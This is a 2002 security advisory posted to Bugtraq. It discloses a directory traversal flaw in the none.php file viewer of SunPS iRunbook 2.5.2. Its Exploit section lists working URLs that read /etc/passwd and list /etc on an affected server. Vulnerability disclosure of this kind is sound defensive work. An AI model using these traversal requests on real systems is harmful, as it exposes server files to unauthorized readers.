Portcullis Security Advisory - Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

From: JWC@portcullis-security.com
Date: 07/11/02


From: JWC@portcullis-security.com
To: bugtraq@securityfocus.com
Date: Thu, 11 Jul 2002 10:11:54 +0100

Portcullis Security Advisory

Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

Vulnerability discovery and development: John Clayton, Portcullis Security
Testing Services Team Leader

Affected system: SunPS iRunbook Version 2.5.2 complied by Mike Corlett -
15:00 - 8th January 2002 running on Apache 1.3.22 with PHP 4.0.6 - Kernel
version: SunOS 5.8 Generic 108528-12 September 2001 System Type:
SUNW,Sun-Blade-100

Details:
The file none.php used in iRunbook Explorer to view files from the build
snapshot can be manipulated to view any files or folders on the server
providing the web server user has read access to the file and directory. It
was initially achieved by studying the request strings in the links to view
files in the build report and seeing that it makes requests for file paths
with ":" of instead of the usual "/". Thus is was possible to use directory
traversal to view any file or folder. Later it was discovered that the
"..:..:" wasn't needed to traverse directories and the path to the file just
needs to be entered in the web browser after the ?.

Impact:

Any user that can access the webserver can view files and directories on the
system that are usually world readable such as /etc/ and /etc/passwd.

Exploit:

view passwd file -

http://>/content/base/build/explorer/none.php?..:..:..:..:..:.
.:..:etc:passwd:

or

http://>/content/base/build/explorer/none.php?/etc/passwd

view contents of /etc directory -

http://>/content/base/build/explorer/none.php?..:..:..:..:..:.
.:..:etc:

or

http://>/content/base/build/explorer/none.php?/etc/

Copyright Portcullis Computer Security Limited 2002, All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the
express written consent of Portcullis Computer Security Limited.

Disclaimer: The information herein contained may change without notice. Use
of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's risk.
In no event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

John Clayton
Portcullis Computer Security Ltd.
Security Testing Services Team Leader and
Dragon IDS Technical Product Manager
www.portcullis-security.com